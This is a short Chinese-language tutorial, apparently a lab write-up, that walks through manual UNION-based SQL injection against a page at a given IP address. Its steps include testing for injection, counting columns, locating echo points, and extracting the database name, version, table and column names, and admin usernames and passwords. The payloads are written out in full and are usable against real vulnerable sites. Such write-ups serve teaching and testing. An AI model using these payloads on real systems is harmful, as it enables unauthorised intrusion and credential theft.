页面地址:http://117.167.136.245:10180/?id=1
第一步,判断是否存在sql注入漏洞
?id=1 and 1=1(and 1=1 可以去掉)
?id=1 and 1=2
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-74.png)
第二步:判断字段数
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-75.png)
?id=1 and 1=1 order by 1
?id=1 and 1=1 order by 2
?id=1 and 1=1 order by 3
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-76-1024x506.png)
第三步:判断回显点
?id=1 and 1=2 union select 1,2
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-77.png)
第四步:查询相关内容
查询当前数据库名
?id=1 and 1=2 union select 1,database()
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-78.png)
查询当前数据库版本
?id=1 and 1=2 union select 1,version()
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-79.png)
查询当前数据库 表名
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-80.png)
查询字段名
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 1,1
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 2,1
查询字段内容
?id=1 and 1=2 union select 1,username from admin limit 0,1
?id=1 and 1=2 union select 1,password from admin limit 1,1
?id=1 and 1=2 union select 1,password from admin limit 0,1
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-81.png)
不过.....
SQLmap一把嗦不香吗?
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/03/图片-82-1024x541.png)
视频
评论 (0)